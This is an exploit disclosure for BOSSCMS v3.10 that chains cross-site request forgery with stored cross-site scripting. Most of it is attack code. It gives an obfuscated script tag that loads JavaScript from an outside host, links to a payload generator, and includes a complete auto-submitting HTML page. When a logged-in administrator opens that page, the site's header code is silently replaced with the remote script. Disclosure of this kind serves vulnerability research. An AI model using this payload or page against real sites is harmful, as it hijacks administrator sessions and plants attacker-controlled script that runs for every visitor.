Exploit Title: BOSSCMS has CSRF and storage-optimized XSS
Date: 2024-04-01
Exploit Author:
Vendor Homepage: https://gitee.com/Greenpeas/BOSSCMS
Software Link: https://gitee.com/Greenpeas/BOSSCMS/archive/refs/tags/V3.1202310281625.zip
Version: Bosscms v3.10
bosscms xss link:https://github.com/ss122-0ss/BOSSCMS/blob/main/readme.md
csrf
In name="head_code" or name="foot_code", add payload, the payload here is
<sCRiPt sRC=//uj.ci/szi></sCrIpT>
payload can be generated at https://xssaq.com/
Put the HTML in a CSRF. In HTML, an administrator access to the http://127.0.0.1/csrf.html page, will automatically trigger modify code, triggering payload
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/bosscms1/admin/?mold=site&part=code&func=add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="head_code" value="<sCRiPt sRC=//uj.ci/szi></sCrIpT>" />
<input type="hidden" name="foot_code" value="test" />
<input type="hidden" name="head_mobile_code" value="" />
<input type="hidden" name="foot_mobile_code" value="" />
<input type="hidden" name="csrftoken" value="sk92ef5fq7e14j0lcm" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>